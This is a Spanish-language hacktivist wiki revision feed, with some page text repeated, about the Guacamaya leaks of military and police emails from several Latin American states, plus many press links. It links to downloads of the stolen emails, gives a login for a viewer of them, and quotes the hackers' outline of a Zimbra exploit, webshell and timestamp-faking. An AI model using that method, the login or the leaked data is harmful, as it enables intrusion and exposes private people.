Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=626Fuerzas Represivas2022-10-20T14:27:09Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Guacamaya&diff=625Guacamaya2022-10-16T22:47:26Z<p>Enlacehacktivista: /* Entrevistas */</p>
<hr />
<div>[[File:Guacamayas.jpeg|thumb|el colectivo]]<br />
Guacamaya es un grupo de hackers que busca la liberación de los pueblos y el territorio de Abya Yala, hasta ahora enfocándose en hackear a empresas extractivistas y fuerzas represivas (policia y militar)<br />
<br><br />
Nunca tendrán cuentas en redes sociales. [https://twitter.com/guacamayahacks Estas] [https://twitter.com/GuacamayanLeaks cuentas] son [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsas.]<br />
<br />
== Hackeos ==<br />
<br />
* [[Pronico]]<br />
* [[Extractivist Leaks/es|Extractivist Leaks]]<br />
* [[Fiscalia|Fiscalia de Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== Comunicados ==<br />
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Pronico]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya2.txt Extractivist Leaks]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya3.txt Fiscalia de Colombia]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya4.txt Fuerzas Represivas]<br />
<br />
== Poemas ==<br />
* https://enlacehacktivista.org/poema_guacamaya.txt<br />
<br />
== Videos ==<br />
* [https://enlacehacktivista.org/hackback.webm Hackeo de Pronico]<br />
* [https://enlacehacktivista.org/hackback2.webm Explotación de Proxyshell] usado en todos los hackeos de [[Extractivist Leaks/es|Extractivist Leaks]], [[Fiscalia|Fiscalia de Colombia]], y [[Fuerzas Represivas]] con la excepción de [[Fuerzas Represivas#Explicación del Hackeo|Sedena.]]<br />
<br />
== Entrevistas ==<br />
* https://forbiddenstories.org/es/la-lucha-por-un-territorio-es-la-lucha-de-todas/<br />
* https://la-lista.com/mexico/2022/10/10/hackers-guacamaya-entrevista-exclusiva-con-el-grupo-hacktivista<br />
* https://www.vice.com/en/article/5d39j3/meet-the-environmental-hacktivists-trying-to-sabotage-mining-companies<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://loquesigue.tv/quien-esta-detras-de-los-guacamayaleaks-entrevista-al-colectivo-guacamaya/<br />
* https://www.ultimominuto.news/noticias/Entrevista-con-Guacamaya-Cual-fue-el-hallazgo-mas-importante-del-hackeo-20221016-0016.html<br />
<br />
== Ilustraciones ==<br />
<br />
[[File:Resistencia_Milenaria.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_mina.png|400px|border|Fin de la mina]]<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
<br />
[[Category:Hackers]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Liberty_Counsel&diff=624Liberty Counsel2022-10-15T21:19:33Z<p>Enlacehacktivista: </p>
<hr />
<div>Liberty Counsel is an organization that campaigns against the right to abortion and the rights of queer people. Anonymous hackers compromised the website of Liberty Counsel and other evangelical and right-wing groups on the same host, getting access to their donor information. The hackers released a [https://enlacehacktivista.org/libertycounsel.txt statement] and published the data as a [https://enlacehacktivista.org/libertycounsel.torrent torrent.] In response, several members of congress signed a [[Media:Letter-to-AG-Garland.pdf|strongly worded letter]] expressing concern over hackers who "mocked the rule of law".<br />
<br />
== Media Coverage ==<br />
<br />
* https://theintercept.com/2022/08/25/liberty-counsel-data-breach/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=File:Letter-to-AG-Garland.pdf&diff=623File:Letter-to-AG-Garland.pdf2022-10-15T21:15:49Z<p>Enlacehacktivista: Members of congress request attorney general to take action against hackers</p>
<hr />
<div>== Summary ==<br />
Members of congress request attorney general to take action against hackers</div>Enlacehacktivista